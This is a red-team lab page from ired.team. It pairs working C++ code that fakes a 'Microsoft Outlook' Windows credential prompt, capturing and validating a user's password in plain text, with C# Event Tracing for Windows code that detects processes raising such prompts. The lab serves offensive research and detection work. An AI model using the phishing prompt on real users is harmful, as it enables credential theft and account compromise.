Red Teaming Experiments
linkedintwitterpatreongithub
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Dumping Credentials from Lsass Process Memory with Mimikatz
Dumping Lsass Without Mimikatz
Dumping Lsass without Mimikatz with MiniDumpWriteDump
Dumping Hashes from SAM via Registry
Dumping SAM via esentutl.exe
Dumping LSA Secrets
Dumping and Cracking mscash - Cached Domain Credentials
Dumping Domain Controller Hashes Locally and Remotely
Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy
Network vs Interactive Logons
Reading DPAPI Encrypted Secrets with Mimikatz and C++
Credentials in Registry
Password Filter
Forcing WDigest to Store Credentials in Plaintext
Dumping Delegated Default Kerberos and NTLM Credentials w/o Touching Lsass
Intercepting Logon Credentials via Custom Security Support Provider and Authentication Packages
Pulling Web Application Passwords by Hooking HTML Input Fields
Intercepting Logon Credentials by Hooking msv1_0!SpAcceptCredentials
Credentials Collection via CredUIPromptForCredentials
Lateral Movement
Persistence
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
Credentials Collection via CredUIPromptForCredentials

The purpose of this lab is to twofold:
  1. 1.
    write some code that invokes Windows credential prompt, that would allow malware or an attacker to collect targeted user's credentials once they are on the compromised machine
  2. 2.
    write some ETW code that detects processes invoking credential prompts

It is possible to collect user credentials with the below code:
credentialsprompt.cpp
#include <iostream>
#include <Windows.h>
#include <wincred.h>
​
#pragma comment(lib, "Credui.lib")
​
int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
CREDUI_INFO ci = { sizeof(ci) };
std::wstring promptCaption = L"Microsoft Outlook";
std::wstring promptMessage = L"Connecting to [email protected]";
ci.pszCaptionText = (PCWSTR)promptCaption.c_str();
ci.pszMessageText = (PCWSTR)promptMessage.c_str();
​
WCHAR username[255] = {};
WCHAR password[255] = {};
DWORD result = 0;
​
result = CredUIPromptForCredentialsW(&ci, L".", NULL, 5, username, 255, password, 255, FALSE, CREDUI_FLAGS_GENERIC_CREDENTIALS);
if (result == ERROR_SUCCESS)
{
HANDLE newToken = NULL;
BOOL credentialsValid = FALSE;
​
credentialsValid = LogonUserW(username, NULL, password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &newToken);
if (credentialsValid)
{
// valid credentials provided
}
else
{
// invalid credentials provided
}
}
else if (result == ERROR_CANCELLED)
{
// no credentials provided
}
​
return 0;
}
Although in this lab I am using CredUIPromptForCredentials for invoking credentials prompt, you should be using CredUIPromptForWindowsCredentials​
If we compile and run the above code, we get a credential prompt, that captures user's credentials in plain text, which we could then save to a file or send out over the internet:
The above credential prompt can also be invoked with PowerShell cmdlet Get-Credential.

As a defender, one may want to know what processes are popping these credential prompts, so that malicious ones could be detected - i.e if you are notified that suddenly some unusual process showed a prompt, it may mean that the process is infected and the machine is compromised.
Detection of programs showing credential prompts is possible with Event Tracing for Windows (EWT) - Microsoft-Windows-CredUI provider to the rescue:
Looking at the provider Microsoft-Windows-CredUI in ETWExplorer, we can see that it can provide consumers with events for both CredUIPromptForCredentials and CredUIPromptForWindowsCredentials invokations:
We can create an ETW tracing session and subscribe to events from Microsoft-Windows-CredUI provider with C# like so:
credentialsprompt-detection.cs
# based on https://github.com/zodiacon/DotNextSP2019/blob/master/SimpleConsumer/Program.cs
using Microsoft.Diagnostics.Tracing.Session;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
​
namespace SimpleConsumer
{
static class Programa
{
static void Main(string[] args)
{
using (var session = new TraceEventSession("spotless-credential-prompt"))
{
Console.CancelKeyPress += delegate {
session.Source.StopProcessing();
session.Dispose();
};
​
session.EnableProvider("Microsoft-Windows-CredUI", Microsoft.Diagnostics.Tracing.TraceEventLevel.Always);
var parser = session.Source.Dynamic;
parser.All += e => {
if (e.OpcodeName == "Start")
{
Console.WriteLine(quot;{e.TimeStamp} > Credential Prompt detected in {Process.GetProcessById(e.ProcessID).ProcessName}.exe (PID={e.ProcessID})");
}
};
session.Source.Process();
}
}
}
}

Below shows RogueCredentialsPrompt.exe and Powershell.exe invoking Windows credential prompts and our simple consumer program detecting that activity:

ETW: Event Tracing for Windows 101
Red Teaming Experiments
GitHub - zodiacon/DotNextSP2019: DotNext 2019 St. Petersburg Talk Demos
GitHub
CredUIPromptForCredentialsA function (wincred.h) - Win32 apps
docsmsft
Previous
Intercepting Logon Credentials by Hooking msv1_0!SpAcceptCredentials
Next - offensive security
Lateral Movement
Last modified 2yr ago
Copy link
On this page
Purpose
Stealing User Credentials
Detecting Credential Prompts
Demo
References